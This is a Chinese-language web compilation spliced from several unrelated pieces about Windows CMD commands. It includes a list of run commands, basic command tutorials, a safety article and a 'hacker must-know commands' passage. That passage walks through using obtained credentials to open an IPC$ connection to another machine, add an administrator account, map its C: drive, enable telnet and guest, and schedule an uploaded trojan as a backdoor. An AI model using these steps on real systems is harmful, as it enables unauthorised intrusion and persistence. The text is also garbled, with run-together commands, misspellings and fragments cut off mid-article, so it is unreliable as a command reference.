messenger-----停止信使服务net start messenger----开始信使服务nslookup-------网络管理的工具向导ntbackup-------系统备份和还原narrator-------屏幕“讲述人”ntmsmgr.msc----移动存储管理器ntmsoprq.msc---移动存储管理员操作请求netstat -an----(TC)命令检查接口syncapp--------创建一个公文包sysedit--------系统配置编辑器sigverif-------文件签名验证程序sndrec32-------录音机shrpubw--------创建共享文件夹secpol.msc-----本地安全策略syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码services.msc---本地服务设置Sndvol32-------音量控制程序sfc.exe--------系统文件检查器sfc /scannow---windows文件保护tsshutdn-------60秒倒计时关机命令tourstart------xp简介（安装完成后出现的漫游xp程序）taskmgr--------任务管理器eventvwr-------事件查看器eudcedit-------造字程序explorer-------打开资源管理器packager-------对象包装程序perfmon.msc----计算机性能监测程序regedit.exe----注册表rsop.msc-------组策略结果集regedt32-------注册表编辑器rononce -p ----15秒关机regsvr32 /u *.dll----停止dll文件运行regsvr32 /u zipfldr.dll------取消ZIP支持cmd.exe--------CMD命令提示符chkdsk.exe-----Chkdsk磁盘检查certmgr.msc----证书管理实用程序calc-----------启动计算器charmap--------启动字符映射表cliconfg-------SQL SERVER 客户端网络实用程序Clipbrd--------剪贴板查看器conf-----------启动netmeetingcompmgmt.msc---计算机管理cleanmgr-------垃圾整理ciadv.msc------索引服务程序osk------------打开屏幕键盘odbcad32-------ODBC数据源管理器oobe/msoobe /a----检查XP是否激活lusrmgr.msc----本机用户和组logoff---------注销命令iexpress-------木马捆绑工具，系统自带Nslookup-------IP地址侦测器fsmgmt.msc-----共享文件夹管理器utilman--------辅助工具管理器gpedit.msc-----组策略ping 计算机中的IP地址ipconfig /all——当使用all选项时，ipconfig能为dns和wins服务器显示它已配置且所要使用的附加信息（如ip地址等），并且显示内置于本地网卡中的物理地址（mac）。

要成为真正黑客必须掌握的**技术|黑客常用CMD命令只要删除这些就可以了有些系统NT装置在D盘或其他盘，就要把C改成其他盘。

1NET只要你拥有某IP用户名和密码，那就用IPC$做连接吧!这里我假如你得到用户是hbx密码是123456假设对方IP为127.0.0.1netus\\127.0.0.1\ipc$"123456"/user:"hbx"退出的命令是netus\\127.0.0.1\ipc$/delte下面的操作你必需登陆后才可以用.登陆的方法就在上面.----------------------下面我讲怎么创建一个用户，由于SA 权限相当于系统的超级用户.加一个heibai用户密码为lovechinanetuserheibailovechina/add只要显示命令胜利，那么我可以把他加入Administr组了.netlocalgroupA dministrheibai/add----------------------这里是讲映射对方的C盘，当然其他盘也可以，只要存在就行了.这里把对方的C盘映射到外地的Z盘.netusz:\\127.0.0.1\c$----------------------netstarttelnet这样可以打开对方的TELNET服务.----------------------这里是将Guest用户激活，guestNT默认用户，而且无法删除呢?不知道是否这样，2000就是删除不了netuserguest/active:yes----------------------这里是把一个用户的密码改掉，把guest密码改为lovechina其他用户也可以的只要有权限就行了呀!netuserguestlovechinanet命令果然强大啊!2:at一般一个**者**后都会留下后门，也就是种木马了把木马传了上去，怎么启动他呢?那么需要用AT命令，这里假设你已经登陆了那个服务器。

cmd指令大全CMD指令大全。

CMD指令是Windows系统中的命令行工具，可以通过CMD指令来完成各种系统操作和管理任务。

本文将为大家介绍一些常用的CMD指令，帮助大家更好地了解和使用Windows系统。

1. dir。

dir指令用于显示当前目录下的文件和文件夹列表。

在CMD中输入dir后按下回车键，系统将列出当前目录下的所有文件和文件夹名称、大小、创建日期等信息。

2. cd。

cd指令用于切换当前目录。

在CMD中输入cd加上目标目录的路径后按下回车键，系统将切换到指定的目录。

3. del。

del指令用于删除指定的文件。

在CMD中输入del加上文件名后按下回车键，系统将删除指定的文件。

4. copy。

copy指令用于复制文件。

在CMD中输入copy加上源文件和目标文件的路径后按下回车键，系统将复制源文件到目标文件。

5. move。

move指令用于移动文件。

在CMD中输入move加上源文件和目标文件的路径后按下回车键，系统将移动源文件到目标文件。

6. format。

format指令用于格式化磁盘。

在CMD中输入format加上磁盘盘符后按下回车键，系统将格式化指定的磁盘。

7. ipconfig。

ipconfig指令用于显示当前系统的网络配置信息。

在CMD中输入ipconfig后按下回车键，系统将显示当前系统的IP地址、子网掩码、网关等信息。

8. ping。

ping指令用于测试网络连接。

在CMD中输入ping加上目标主机的IP地址或域名后按下回车键，系统将发送数据包到目标主机并显示通信状态。

9. tasklist。

tasklist指令用于显示当前系统的进程列表。

在CMD中输入tasklist后按下回车键，系统将列出当前系统中所有正在运行的进程。

10. shutdown。

shutdown指令用于关闭或重启计算机。

在CMD中输入shutdown加上参数后按下回车键，系统将按照指定的参数关闭或重启计算机。

11. netstat。

十个最危险的cmd代码标题：十个最危险的CMD代码：保护个人电脑安全的必知事项引言：计算机操作系统的命令行界面（CMD）常常被用于执行各种任务和处理计算机操作。

然而，有些CMD代码可能带有潜在的危险性，可能导致个人电脑系统受到损害或被黑客入侵。

本文将介绍十个最危险的CMD代码，并提供逐步指导，以确保您的个人电脑安全。

第一部分：了解CMD代码的危险性首先，我们需要了解为什么这些CMD代码会被认为是危险的。

很多CMD 代码可以访问操作系统底层，以及系统文件和其他与系统安全相关的设置。

此外，某些CMD代码可以针对个人电脑进行攻击，包括删除文件、更改设置和入侵网络等。

第二部分：十个最危险的CMD代码详解1. format：这个命令用于格式化磁盘驱动器，将其中的数据全部清空。

格式化后，所有数据都将无法恢复。

慎用此命令，以免丢失重要文件。

2. del：此命令用于删除文件和文件夹。

如果使用不当，可能会不小心删除重要文件。

在执行此命令前，请仔细检查要删除的内容。

3. regedit：regedit允许用户访问和更改注册表，这是存储操作系统和应用程序重要设置的地方。

误操作可能导致系统不稳定，造成数据丢失。

4. shutdown：shutdown命令用于关闭或重启计算机。

误操作可能导致未保存的工作丢失，因此在使用此命令之前，请确保已保存所有重要的文件和数据。

5. assoc：此命令用于更改文件关联。

如果您无意更改文件的默认关联程序，可能会导致错误的应用程序打开文件，或者在打开某些文件时发生错误。

6. taskkill：taskkill命令用于结束正在运行的任务和进程。

在使用此命令之前，请确保了解哪些任务和进程可以结束，以避免关闭重要的系统进程。

7. netstat：这个命令用于列出当前计算机上的网络连接。

虽然对于识别网络问题非常有用，但也可能泄露计算机上的敏感信息，因此请慎重使用。

8. attrib：attrib用于修改文件和文件夹的属性，包括隐藏、只读和系统属性。

dos命令⼤全⿊客必知的DOS命令集合⼀般来说dos命令都是在dos程序中进⾏的，如果电脑中安装有dos程序可以从开机选项中选择进⼊，在windows 系统中我们还可以从开始运⾏中输⼊cmd命令进⼊操作系统中的dos命令，如下图：严格的说，windows 中的命令窗⼝并不是真正意义上的dos操作界⾯，其功能并不全⾯，真正的dos程序是在电脑中没进⼊系统⽽进⼊的dos 界⾯，如下图：如上图，我们只要在dos界⾯中输⼊各种dos命令，即可实现相应的命令，下⾯分享下dos命令⼤全：net use ipipc " " /user:" " 建⽴IPC空链接 net use ipipc "密码" /user:"⽤户名" 建⽴IPC⾮空链接net use h: ipc "密码" /user:"⽤户名" 直接登陆后映射对⽅C：到本地为H: net use h: ipc登陆后映射对⽅C：到本地为H:net use ipipc /del 删除IPC链接 net use h: /del 删除映射对⽅到本地的为H:的映射 net user ⽤户名　密码　/add 建⽴⽤户 net user guest/active:yes 激活guest⽤户 net user 查看有哪些⽤户 net user 帐户名查看帐户的属性 net locaLGroup administrators ⽤户名 /add 把“⽤户”添加到管理员中使其具有管理员权限,注意：administrator后加s⽤复数 net start 查看开启了哪些服务 net start 服务名　开启服务；(如:net start telnet， net start schedule) net stop 服务名停⽌某服务 net time ⽬标ip 查看对⽅时间 net time ⽬标ip /set 设置本地计算机时间与“⽬标IP”主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域⽹内开启了哪些共享 net view ip 查看对⽅局域⽹内开启了哪些共享 net config 显⽰系统⽹络设置 net logoff 断开连接的共享 net pause 服务名暂停某服务 net send ip "⽂本信息" 向对⽅发信息 net ver 局域⽹内正在使⽤的⽹络连接类型和信息 net share 查看本地开启的共享 net share ipc开启ipc共享 net share ipc /del 删除ipc共享 net share c /del 删除C：共享net user guest 12345 ⽤guest⽤户登陆后⽤将密码改为12345net password 密码更改系统登陆密码netstat -a 查看开启了哪些端⼝,常⽤netstat -annetstat -n 查看端⼝的⽹络连接情况，常⽤netstat -annetstat -v 查看正在进⾏的⼯作netstat -p 协议名例：netstat -p tcq/ip 查看某协议使⽤情况（查看tcp/ip协议使⽤情况）netstat -s 查看正在使⽤的所有协议使⽤情况nBTstat -A ip 对⽅136到139其中⼀个端⼝开了的话，就可查看对⽅最近登陆的⽤户名（03前的为⽤户名）-注意：参数-A要⼤写trAcert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”⽤于设置超时间隔。

教大家5个装逼用的CMD命令，让人一看你就是个电脑高手很多电脑小白使用电脑时，只会用鼠标点来点去的，教大家5个装逼用的CMD命令，让人一看你就是个电脑高手，专门震慑小姐姐、小学生。

首先我们需要打开CMD命令提示符，这个操作大家都知道，按下键盘上的Windows R键，然后输入“CMD”，按下回车键。

一、改变命令提示符配色我们可以先输入“Color”—“空格”—“help”，来获取颜色的帮助。

从这里可以看到，各种颜色的代码：0~7、A~F。

如果想把CMD里面的文字颜色，改变成某一个颜色的话，我们就可以输入“Color”—“空格”—“颜色代码”。

比如想把它变成紫色，就输入5，这样文字就变成紫色了。

如果想把默认的黑色背景，改成灰色的背景，可以输入“Color”—“空格”—“85”，就可以拥有灰色背景和紫色的文字。

如果想要恢复默认的风格，就输入“Color”—“空格”—“07”，就变成黑色的背景、白色的文字了。

二、查看所有网络设备的IP信息在命令提示符中输入“ipconfig”—“空格”—“/”—“alll”，这样就可以查看我们电脑上，所有的网络设备的IP信息。

三、从CMD中访问网站我们可以输入“START”—“空格”，输入我们需要访问的网址。

举个例子：输入百度的网址，按下回车键，就可以用默认的浏览器打开你输入的网站了。

四、创建与删除文件夹我们可以使用MD命令，创建一个让别人无法删除的网站，输入“MD”—“空格”，输入需要创建的文件夹名称，比如说输入“123..”，然后输入“\”。

这样就可以创建出一个带小数点的文件夹，桌面刷新以后，文件夹就会创建成功，我们可以尝试右键删除，它会提示“找不到该项目”。

如果我们需要删除这个文件夹，需要使用对应的“RD”—“空格”—“123..”—“\”，这样就可以删除它了。

五、隐藏文件夹如果我们需要隐藏某个盘符里面的文件夹，我们可以先打开盘符的路径，然后在上面的地址栏输入“cmd”按下回车键，将会打开命令提示符。